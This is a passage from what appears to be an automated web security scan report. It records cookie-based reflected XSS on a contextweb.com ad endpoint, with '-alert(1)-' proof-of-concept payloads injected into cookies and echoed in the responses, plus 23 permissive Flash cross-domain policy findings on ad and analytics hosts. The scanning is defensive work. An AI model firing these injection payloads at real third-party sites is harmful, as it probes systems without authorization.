User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv1d57c'-alert(1)-'4e697206eb9; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB30
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2583
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:17 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv1d57c'-alert(1)-'4e697206eb9; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:17 GMT; path=/
Set-Cookie: 536156_4_101378=1304949617628; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524678643521|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:17 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
<img src="http://tags.bluekai.com/site/3358?id=wOebwAz4UvVv1d57c'-alert(1)-'4e697206eb9" height="1" width="1" />
...[SNIP]...
3.147. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The value of the cwbh1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3887a'-alert(1)-'d025171d98 was submitted in the cwbh1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD13887a'-alert(1)-'d025171d98; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2644
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:17 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:18 GMT; path=/
Set-Cookie: 536156_4_101378=1304949618038; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524674394528|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:18 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
<IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.NEWSCURRENTAFFAIRS,536156,541,1697,1443,,LIFL1,FCRT1,ZETC1,AMQU2,NETM7,EXPD13887a'-alert(1)-'d025171d98,728X90" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...
4. Flash cross-domain policy  previous  next
There are 23 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://ad-apac.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Mon, 09 May 2011 14:01:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
4.2. http://ad.au.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.au.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Thu, 23 Oct 2008 00:22:36 GMT
Date: Mon, 09 May 2011 14:02:49 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
4.3. http://adserver.adtech.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>
4.4. http://adserverams.adtech.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserverams.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserverams.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>
4.5. http://alvenda.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: alvenda.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:52 GMT
Server: Omniture DC/2.0.0
xserver: www268
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
4.6. http://api.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Thu, 10 Mar 2011 15:50:46 EST
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 118
Date: Mon, 09 May 2011 14:04:27 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>
4.7. http://cspix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 09 May 2011 14:05:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
4.8. http://f2nthevine.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: f2nthevine.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: Omniture DC/2.0.0
xserver: www22
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
4.9. http://ie-stat.bmmetrix.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ie-stat.bmmetrix.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:51 GMT
Server: Apache/2
Last-Modified: Mon, 19 May 2008 17:46:09 GMT
ETag: "1dea8-c4-44d98f0503a40"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
4.10. http://imp.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...
4.11. http://in.getclicky.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:17 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
ETag: "cb802f-c9-433f845a21a00"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
4.12. http://ipcmedia.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ipcmedia.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
xserver: www13
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
4.13. http://irishtimesgroup.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: irishtimesgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:12 GMT
Server: Omniture DC/2.0.0
xserver: www141
Content-Length: 93
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>
4.14. http://p.addthis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.addthis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.addthis.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:01 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
4.15. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012359000"
Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT
Content-Type: application/xml
Content-Length: 211
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...
4.16. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 02:46:13 GMT
Expires: Tue, 10 May 2011 02:46:13 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 40491

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
4.17. http://secure-au.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:49 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 14:06:49 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...
4.18. http://va.px.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:29 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
4.19. http://edge.viagogo.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.viagogo.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.viagogo.co.uk

Response

HTTP/1.0 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Date: Mon, 09 May 2011 14:01:15 GMT
Expires: Tue, 10 May 2011 14:01:15 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: .VGGANON=qOnF8gMwzgEkAAAAMGY0MjJiMTAtZWEzOC00MTVkLWE5MWMtMjM3NWZmM2M0OGMx0; domain=viagogo.co.uk; expires=Wed, 03-Apr-2013 00:41:15 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=8e482fb9-b603-4f0f-8ec3-c8fd97b01e43; domain=viagogo.co.uk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 1016
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.viagogo.net" />
<allow-access-from domain="*.viagogo.co.uk" />
<allow-access-from domain="*.viagogo.com" />
<allow-access-from domain="*.viagogo.at" />
<allow-access-from domain="*.viagogo.be" />
<allow-access-from domain="*.viagogo.ch" />
<allow-access-from domain="*.viagogo.de" />
<allow-access-from domain="*.viagogo.dk" />
<allow-access-from domain="*.viagogo.es" />
<allow-access-from domain="*.viagogo.fr" />
<allow-access-from domain="*.viagogo.ie" />
<allow-access-from domain="*.viagogo.it" />
<allow-access-from domain="*.viagogo.lu" />
<allow-access-from domain="*.viagogo.lv" />
<allow-access-from domain="*.viagogo.nl" />
<allow-access-from domain="*.viagogo.ru" />
<allow-access-from domain="*.viagogo.se" />
<allow-access-from domain="*.viagogo.pt" />
<allow-access-from domain="*.viagogo.pl" />
<allow-access-from domain="*.viagogo.co.za" />
...[SNIP]...
4.20. http://l.alvenda.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://l.alvenda.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.alvenda.net

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 489
Last-Modified: Tue, 22 Mar 2011 15:28:56 GMT
Server: Jetty(6.1.22)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...
<allow-access-from domain="*.alvenda.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.alvenda.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akamai.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="false"/>
...[SNIP]...
4.21. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:25 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...
4.22. http://static.nme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.nme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.nme.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 05 May 2011 12:04:21 GMT
ETag: "15b82fe-3fa-4a2862c655b40"
Accept-Ranges: bytes
Content-Length: 1018
Content-Type: text/xml
Cache-Control: max-age=2592000
Expires: Wed, 08 Jun 2011 14:02:17 GMT
Date: Mon, 09 May 2011 14:02:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="nme.com" />
   <allow-access-from domain="www.nme.com" secure="false" />
...[SNIP]...
<allow-access-from domain="web.nme.com" />
   <allow-access-from domain="*.nme.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ipcignite.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ipcdigital.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.userplane.com" />
   <allow-access-from domain="*.panthercustomer.com" />
   <allow-access-from domain="*.adtech.de" />
   <allow-access-from domain="*.umee.tv" />
   <allow-access-from domain="*.clearspring.com" />
   <allow-access-from domain="*.brightcove.com" />
   <allow-access-from domain="*.google-analytics.com" />
   <allow-access-from domain="*.ipcmediasecure.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nuts.co.uk" />
<allow-access-from domain="*.mousebreaker.com" />
...[SNIP]...
4.23. http://west.thomson.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: west.thomson.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=259200
Content-Length: 283
Content-Type: text/xml
Last-Modified: Mon, 15 Nov 2010 19:47:55 GMT
Accept-Ranges: bytes
ETag: ""
